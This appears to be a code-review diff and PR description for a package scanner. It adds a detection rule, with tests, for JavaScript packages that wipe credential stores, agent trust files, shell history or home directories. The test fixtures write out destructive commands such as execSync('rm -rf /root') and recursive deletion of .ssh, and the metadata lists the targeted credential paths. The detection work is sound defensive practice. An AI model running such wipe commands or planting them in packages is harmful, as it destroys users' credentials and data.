+			name:    "shell rm -rf /root broad wipe -> CRITICAL",
+			content: "require('child_process').execSync('rm -rf /root');\n",
+			want:    true,
+			crit:    true,
+		},
+		{
+			// review round 7 P2: a file under /root is home-anchored.
+			name:    "fs.unlinkSync('/root/.npmrc') is home-anchored -> HIGH",
+			content: "const fs = require('fs');\nfs.unlinkSync('/root/.npmrc');\n",
+			want:    true,
+		},
+		{
+			// review round 7 boundary: /rootkit is not /root.
+			name:    "shell rm -rf /rootkit is not a home wipe",
+			content: "require('child_process').execSync('rm -rf /rootkit');\n",
+			want:    false,
+		},
+		{
+			// review round 8 P2: a combined import naming a *Sync method
+			// (`import fsp, { rmSync } from 'fs/promises'`) is still promises-only,
+			// so the method does not exist.
+			name:    "combined import { rmSync } from fs/promises does not exist",
+			content: "import fsp, { rmSync } from 'fs/promises';\nrmSync('.ssh', { recursive: true });\n",
+			want:    false,
+		},
+		{
+			// review round 8 P2: a nested recursive:true under a top-level
+			// recursive:false does not enable Node's recursive removal.
+			name:    "nested recursive:true under top-level false cannot remove a directory",
+			content: "const fs = require('fs');\nfs.rmSync('.ssh', { recursive: false, retry: { recursive: true } });\n",
+			want:    false,
+		},
+		{
+			// review round 8 positive: a top-level recursive:true alongside a
+			// nested object still fires.
+			name:    "top-level recursive:true with a nested object -> HIGH",
+			content: "const fs = require('fs');\nfs.rmSync('.ssh', { recursive: true, retry: { x: 1 } });\n",
+			want:    true,
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			findings := analyze(t, "index.js", c.content)
+			got := hasRule(findings, RuleWiperTripwire)
+			if got != c.want {
+				t.Fatalf("JS_WIPER_TRIPWIRE_001 present = %v, want %v (findings: %+v)", got, c.want, findings)
+			}
+			if c.want {
+				f := findRule(findings, RuleWiperTripwire)
+				if c.crit && f.Severity != types.SeverityCritical {
+					t.Errorf("expected CRITICAL, got %+v", f)
+				}
+				if !c.crit && f.Severity != types.SeverityHigh {
+					t.Errorf("expected HIGH, got %+v", f)
+				}
+			}
+		})
+	}
+}

--- a/internal/engine/jsrisk/metadata.go
+++ b/internal/engine/jsrisk/metadata.go
@@ -179,5 +179,28 @@ func RuleMetadata() []rulemeta.Rule {
 				"resolver configuration. Inspect the file in a clean clone, remove the package, " +
 				"and audit the affected host surface for tampering.",
 		},
+		{
+			ID:       RuleWiperTripwire,
+			Name:     "Destructive wipe of sensitive paths",
+			Severity: "HIGH",
+			Category: "supply-chain",
+			Analyzer: rulemeta.AnalyzerJSRisk,
+			Description: "Package JavaScript performs a REAL destructive delete of a sensitive " +
+				"path -- a credential store (.ssh/.aws/.gnupg/.kube/.azure/.docker/gcloud), " +
+				"agent/editor trust (.claude/CLAUDE.md/.cursorrules/.vscode), shell history, an " +
+				"evidence log, or a honeytoken -- or a broad wipe of $HOME/~/root, through a " +
+				"bound fs/fs-extra/rimraf delete (rm/rmdir/unlink/remove/emptyDir) or a bound " +
+				"shell rm/unlink/rmdir/find -delete. Credential dirs, history, and honeytokens " +
+				"fire standalone; project-capable config files (.npmrc/.env/.vscode/...) fire " +
+				"only when home-anchored or with a strong partner. Build/cache cleanup " +
+				"(node_modules, dist, build, /tmp, ...), sibling/builder paths (.env.example, " +
+				"tmp + '/.ssh'), comments, strings, db.exec, and unbound local helpers do not " +
+				"match. CRITICAL on a broad home/root wipe, on deleting two distinct credential " +
+				"stores, or when paired with a strong supply-chain partner.",
+			Remediation: "Package install/runtime code has no legitimate reason to delete " +
+				"credential stores, agent trust files, history, or the home directory. Inspect " +
+				"the file in a clean clone, remove the package, and audit the host for missing " +
+				"or altered credentials and trust files.",
+		},
 	}
 }


### PR DESCRIPTION
## What

Adds `JS_WIPER_TRIPWIRE_001`, a JavaScript analyzer detection for package code that destructively deletes credentials, persistence, agent/editor trust files, evidence, or the user/CI/agent home directory.

This fits the same supply-chain behavior lane as the recent Miasma work, but the rule is generic: it detects destructive cleanup behavior in package code, regardless of any specific campaign.

## What it requires

A **real delete bound to a real call**, plus a **sensitive target** — never a text match:

- a bound `fs` / `fs-extra` / `rimraf` delete (`rm`/`rmSync`/`rmdir`/`unlink`/`remove`/`emptyDir`), or
- a bound shell `rm` / `unlink` / `rmdir` / `find … -delete` via `child_process` exec/execSync, `shelljs`, or `spawn`/`execa` `sh -c`,

targeting a sensitive path:

- credential stores (`.ssh`, `.aws`, `.gnupg`, `.kube`, `.azure`, `.docker`, gcloud), shell history, and deletion of an existing canary/honeytoken file
- project-capable config files (`.npmrc`, `.env`, `.vscode`, `.claude`, …) and evidence logs — these fire only when home-anchored or with a strong partner
- a broad wipe of `$HOME`, `~`, a home directory, or literal `/`

Severity: HIGH for a sensitive delete; CRITICAL for a broad home/root wipe, for deleting two distinct credential families in one file, or for a sensitive delete paired with a strong partner (secret read, exfil sink, session sink, Bun stage, GitHub channel, daemonization, obfuscation).

## How it controls false positives

- **Hybrid path anchoring**: home-only stores fire standalone; project-capable files (which legitimately live in repos and get cleaned by tooling) fire only home-anchored or with a partner.
- **Cleanup allowlist**: deletes under `node_modules`, `dist`, `build`, `coverage`, `.next`, `out`, `/tmp` are not wipes; sibling/example paths (`.env.example`, `.ssh.bak`, `canary.txt`) and constructed paths (`tmp + '/.ssh'`, `` `${tmp}/.ssh` ``, `'.ssh'.replace(...)`) are excluded.
- **Bound sinks only**: comments, strings, `db.exec`, and unbound local writers do not match.

## What it does not cover

By design — no full shell parser, no variable-to-path dataflow: the scan is not shell-quote-aware, `find` name/path predicates are not parsed, and `del()`, direct program-API deleters (`spawn('rm', […])`), and runtime honeytoken creation are out of scope. These are documented limits in the code.

## How it fits the trust layer

Package code deleting credentials, agent trust files, or the home directory is a late-stage behavior seen in supply-chain compromises: after install execution, payload staging, exfiltration, C2, or host tampering, destructive cleanup can remove access, evidence, or recovery paths. Aguara flags it locally and deterministically, before the package runs.

## Validation

- Comprehensive test matrix (fs/shell delete forms, HIGH/CRITICAL, broad/glob wipe, family escalation) plus a large false-positive suite, and a scanner-integration check that the finding survives same-line cross-rule dedup.
- Catalog grows 226 → 227; YAML rule count unchanged.
- `make build && make test && make vet && make lint` pass.
